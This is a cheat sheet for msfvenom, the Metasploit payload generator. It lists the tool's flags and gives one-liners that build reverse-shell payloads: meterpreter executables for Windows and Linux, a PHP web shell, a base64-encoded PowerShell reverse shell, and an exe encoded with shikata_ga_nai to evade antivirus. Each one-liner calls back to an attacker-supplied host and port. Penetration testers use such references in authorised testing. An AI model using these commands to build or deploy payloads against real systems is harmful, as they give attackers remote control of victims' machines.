Quick Reference

Common Flags

Flag	Description
`-p <payload>`	Payload to use
`-f <format>`	Output format (`exe`, `elf`, `raw`, `c`, `hex`, `asm`, `ps1`, `dll`, `macho`, `jar`)
`-e <encoder>`	Encoder to use
`-i <count>`	Number of encoding iterations
`-b '<bytes>'`	Bad characters to avoid (e.g. `'\x00\x0a\x0d'`)
`-n <count>`	Prepend N NOPs
`-a <arch>`	Architecture (`x86`, `x64`)
`--platform <os>`	Target platform (`Windows`, `Linux`, `osx`)
`-o <file>`	Write output to file
`LHOST=`	Attacker IP
`LPORT=`	Attacker listening port

List Available Options

msfvenom -l payloads
msfvenom -l encoders
msfvenom -l formats
msfvenom -l platforms

One-liners by Platform

# Windows x64 reverse TCP
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe > shell.exe

# Linux x64 reverse TCP
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf > shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw > shell.php

# PowerShell (base64 encoded)
msfvenom -p windows/powershell_reverse_tcp LHOST=<ip> LPORT=4444 -e cmd/powershell_base64 -f raw > shell.ps1

# Encoded Windows exe (shikata_ga_nai x5)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe